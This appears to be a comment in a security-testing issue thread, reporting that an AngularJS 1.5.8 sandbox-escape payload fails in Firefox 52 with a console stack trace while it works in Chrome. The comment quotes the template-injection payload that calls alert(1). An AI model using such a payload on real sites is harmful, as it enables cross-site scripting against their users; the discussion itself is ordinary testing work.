caseydunham
commented
7 years ago Interesting. Just tested with the same version and it throws an error in the Firefox console:
Error: invalid assignment left-hand side td.prototype.compile@https://code.angularjs.org/1.5.8/angular.min.js:233:35 kc.prototype.parse@https://code.angularjs.org/1.5.8/angular.min.js:260:78 g@https://code.angularjs.org/1.5.8/angular.min.js:125:368 vf/this.$get</m.prototype.$eval@https://code.angularjs.org/1.5.8/angular.min.js:145:343 anonymous/fn@https://code.angularjs.org/1.5.8/angular.min.js line 233 > Function:2:1031 l/<@https://code.angularjs.org/1.5.8/angular.min.js:127:87 vf/this.$get</m.prototype.$digest@https://code.angularjs.org/1.5.8/angular.min.js:143:43 vf/this.$get</m.prototype.$apply@https://code.angularjs.org/1.5.8/angular.min.js:146:111 Bc/c/<@https://code.angularjs.org/1.5.8/angular.min.js:20:486 h/<.invoke@https://code.angularjs.org/1.5.8/angular.min.js:41:454 Bc/c@https://code.angularjs.org/1.5.8/angular.min.js:20:407 Bc@https://code.angularjs.org/1.5.8/angular.min.js:21:179 fe@https://code.angularjs.org/1.5.8/angular.min.js:20:1 @https://code.angularjs.org/1.5.8/angular.min.js:317:386 b@https://code.angularjs.org/1.5.8/angular.min.js:189:487 Sf@https://code.angularjs.org/1.5.8/angular.min.js:37:125 Rf/d@https://code.angularjs.org/1.5.8/angular.min.js:37:74
I don't have time to dig into it right now, but I wonder what changed in the browser. It's still the same version of AngularJS being used.
Browser version: Firefox 52.0.2 Build identifier: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Payload: {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
The alert does not trigger. I first noticed this when Firefox's XSS filter was on; turning it off did not affect the problem. Also I was proxying my traffic through ZAP; I stopped proxying my traffic and it continued to not work. The alert triggers in Chrome.